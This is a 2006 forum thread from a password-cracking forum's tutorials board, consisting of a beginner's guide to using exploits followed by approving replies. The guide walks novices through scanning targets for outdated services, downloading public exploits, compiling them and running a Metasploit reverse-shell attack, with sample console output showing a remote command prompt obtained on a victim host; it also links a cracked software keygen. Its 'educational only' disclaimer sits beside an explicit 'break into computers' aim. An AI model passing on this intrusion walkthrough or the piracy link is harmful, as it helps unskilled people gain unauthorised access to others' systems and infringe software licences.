Go Back   Xisp.org Forums > Porn Password Cracking > Cracking Tutorials

Exploiting Tutorial for Newbs :P

Reply
Views: 9854 - Replies: 27  
Thread Tools Display Modes

Exploiting Tutorial for Newbs :P
Old 01-09-2006, 10:14 AM   #1
overkill
Guest
 
Posts: n/a
Threads: 5107
Exclamation Exploiting Tutorial for Newbs :P

* I have Admin's permission for this *

This is for educational purposes only. Also, You should only test this on your own computers!



I. Intro
This tutorial is not for the experienced. It does not break down the process of how exploits work! This is for those who do not know what exploits are, don’t know how to code, and would like some insight on this method of hacking called “exploiting”. This tutorial will explain how you can easily get into computers without having any knowledge on programming or hacking what so ever. If you in this forum I would think that you do know some basics. This text simply explains some methods to use for the script kiddies, but everyone has to start somewhere don’t they! So, newbs before you get discouraged and quit just remember that “You have to crawl before you can walk, and you have to walk before you can run,” …..


II. What are exploits?

1. Exploits are applications or scripts made by programmers. An Exploit takes advantage of a hole (vulnerability) that has been found in a program, service, or operating system. You can use an exploit to gain access to an unpatched web server’s remote command prompt instantly. Yes, it's really that easy.

2. Most exploits are made to run on Linux, and don't work on Windows. But don't worry, alot of these are also ported to windows. If’ you would like to use linux to get acces to these and other goodies you can use vmware. Crack found here:
Code:
http://rapidshare.de/files/9288607/ishtarkg.zip.html
3.You run the exploit from the command prompt; it looks something like like this (minus a 3-5 lines of commands):



This is the ie_xp_pfv_metafile exploit; it exploits a hole in Windows XP and 2003, and Vista. If you don't know how to start the command prompt in windows, please stop reading!


III. Where can I get exploits?

1. You can download unncompiled exploits at:
http://www.packetstormsecurity.nl
http://archives.neohapsis.com/.nl
http://www.milw0rm.com
http://www.frsirt.com

and more….

2. You can also download user friendly programs that have them for you.
Here are two:
Metasploit <- http://www.metasploit.com/ projects/Framework/downloads.html
ExploitTree search (unix)<- http://www.securityforest.com/wiki/index.php/Category:ExploitTree


IV. Which exploit should I choose?

1. This depends on your target. The first thing you want to ask is “what services is your target running?” A few scanners that do this for you are:
Superscanner -> http://www.foundstone.com
Nmap -> http://www.insecure.org/nmap/
And there are others for win and unix machines…

2. Take a look at this example of a scan log made by nmap:



You could search exploits for the Apache httpd 1.3.31 webserver, the FTP server, SSH server, and the SMTP server. Knowing that these versions are old and not “up-to-date”, we could find something. Find out what services your target is running. If you can find an old version of something chances are there’s an exploit for it. Just search the directories given to you in this tutorial and see what comes up. Your target not running any services? All ports closed? If they are then this is where we could see if the site’s member’s area is spoofable or if the site has a exploitable program or script you could access by URL (both will not be explained in this tutorial). There are lots of different ways in, and your only limited by your imagination. Ohh and up-to-date patched software with no known vulnerabilities. At least for scriptkiddies


V. How do I compile exploits?

1.First, you should check out the programming language the exploit is made. Look up the file extension in Google and this will usually tell you.

2. If it's made for C you should get a C compiler and just paste the code into the compiler, click a button that says "Compile" and you're done. There are tons of C compilers, some of them are free. I use bloodshed that can be found here: http://www.bloodshed.net
If you're using linux and need to compile a C program, type "gcc exploit.c -o exploit" replacing "exploit.c" for the name of the C file to compile.

4.For other languages, just get a compiler for the language the exploit is coded in and do the exact same. You should use different compilers for different languages of course.


VI. How do I use them to break into computers?

Once you have a compiled exploit for your security hole, it’s time to use it! All you need to do is type the name of the exploit in the command prompt or shell, it will tell you how to use it. Metasploit works a little different and has an easy to read user manual. Here is a metasploit exploit execution example: (after all the options are set):

apache_chunked_win32(win32_reverse) > exploit 192.168.1.101 < - executing command in console

results ----v
[*] Starting Reverse Handler.
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
[*] Got connection from 192.168.1.101:1031

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Apache Group\Apache>

This can give you a remote command prompt. Most exploits do this! Some will let you upload stuff, some will let you send remote commands, others let you view important files, etc… The beauty with metasploit is you can choose what you’d like to do after you you exploit the vulnerability in the system (it’s called a PAYLOAD). This concludes the tutorial!

Have fun with the new knowledge; but most of all:
Be Careful and try not to do something stupid :P

Last edited by overkill; 01-10-2006 at 12:22 PM..
  Reply With Quote

Old 01-09-2006, 11:03 AM   #2
A_Tjuh
Guest
 
Posts: n/a
Threads: 5107
Default

Don't forget your disclamer that its for educational purposes only ;)

Nice tut btw :)
  Reply With Quote

Old 01-09-2006, 11:09 AM   #3
overkill
Guest
 
Posts: n/a
Threads: 5107
Default

Thanks A_Tjuh,

I added that part :]
  Reply With Quote

Old 01-09-2006, 01:29 PM   #4
maxgiver
Platinum Exploiter
 
maxgiver's Avatar
 
maxgiver is offline Offline
Join Date: Jun 2005
Location: ...
Posts: 1,605
Threads: 275
maxgiver is on a distinguished road
Default

job well done overkill, nice work you put in 2 this,

very well explained,

good work!!

Last edited by maxgiver; 01-09-2006 at 01:32 PM..
  Reply With Quote

Old 01-09-2006, 01:30 PM   #5
maxgiver
Platinum Exploiter
 
maxgiver's Avatar
 
maxgiver is offline Offline
Join Date: Jun 2005
Location: ...
Posts: 1,605
Threads: 275
maxgiver is on a distinguished road
Default

job well done overkill, nice work you put in 2 this,

very well explained,

good work!!
  Reply With Quote

Old 01-09-2006, 01:51 PM   #6
surfer663
Guest
 
Posts: n/a
Threads: 5107
Default

overkill thanks a lot dude this seems an awsom tutorial at least ya one person who has taken the time to help the newbies here unlike others

once again thanks a lot man
  Reply With Quote

Old 01-09-2006, 05:10 PM   #7
slysnake
Cheshire Cat
 
slysnake's Avatar
 
slysnake is offline Offline
Join Date: Jan 2005
Posts: 5,507
Threads: 315
slysnake is on a distinguished road
Default

Nice tutorial!! Very clear and easy to understand. Plus I don't think it goes too far at letting all the cookies out of the bag. Well done. I especially liked this part...
Quote:
If you don't know how to start the command prompt in windows, please stop reading!
__________________
"How do you know I'm mad?" said Alice.
"You must be," said the Cat, "or you wouldn't have come here."
  Reply With Quote

Old 01-12-2006, 01:18 PM   #8
Permutant
Banned
 
Permutant is offline Offline
Join Date: Jan 2006
Posts: 178
Threads: 23
Permutant is on a distinguished road
Default

One of the best texts I've read about exploits, thanks a lot!
  Reply With Quote

Old 01-17-2006, 10:23 AM   #9
fanatic32
Guest
 
Posts: n/a
Threads: 5107
Default

yeah great tut gives enough info to start out with.
  Reply With Quote

Old 01-17-2006, 11:17 AM   #10
xardi
Regular Member
 
xardi is offline Offline
Join Date: Oct 2005
Location: Poland
Posts: 917
Threads: 32
xardi is on a distinguished road
Default

Really nice tut:)
Good work
  Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump



All times are GMT -4. The time now is 12:07 PM.


vBulletin skin developed by: Xisp.org Crew
Powered by vBulletin®
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
2005 © Copyright Xisp.org